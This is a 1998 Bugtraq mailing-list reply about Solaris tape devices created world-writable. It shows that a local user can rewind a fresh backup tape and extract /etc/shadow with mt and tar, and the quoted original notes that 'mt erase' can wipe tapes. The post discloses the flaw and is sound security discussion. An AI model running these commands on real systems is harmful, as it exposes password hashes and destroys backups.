Bugtraq mailing list archives
Re: solaris tape dev permission stupidity
From: rob () RPI NET AU (Robert Thomas)
Date: Thu, 22 Oct 1998 12:17:54 +1000
joshua grubman wrote:
under solaris, scsi tape devices (/dev/rmt/*, which are linked to the st@x,x: devs in /devices) are created with the permissions bits set to 666. this allows a mallicious user with a login on your system to 'mt erase' the contents of any tape devices connected to your system.
It's not that simple. Say, for example, you the unix administrator, as a good boy/girl, does a daily backup... That backup is written to the tape. All is well and good. You leave your desk, and start to wander over to the computer room, to pull the tape out of the drive. IN that time, someone's done: lamer@leeto$ cd lamer@leeto$ mt -f /dev/nrmt/0h rewind lamer@leeto$ tar xvf /dev/nrmt/0h etc/shadow ... lamer@leeto$ cd etc lamer@leeto$ more shadow ..shadow password entry.. and your shadow password file is open to the world. Just one, of many, bad-things(tm) that can be done with lame-arsed tape permissions. --Rob Thomas
Current thread:
- solaris tape dev permission stupidity joshua grubman (Oct 21)
- Re: solaris tape dev permission stupidity Michael R. Eckhoff (Oct 21)
- Re: solaris tape dev permission stupidity Casper Dik (Oct 22)
- Vulnerability in IRIX autofsd SGI Security Coordinator (Oct 22)
- CDE for Linux Susan Carney (Oct 22)
- Re: CDE for Linux bandregg () REDHAT COM (Oct 23)
- New SMAP + SASL + SSL Patches available. MacGyver (Oct 22)
- <Possible follow-ups>
- Re: solaris tape dev permission stupidity Robert Thomas (Oct 21)
- Re: solaris tape dev permission stupidity Darren J Moffat - Enterprise Services OS Product Support Group (Oct 22)
- Re: solaris tape dev permission stupidity Tobias J. Kreidl (Oct 23)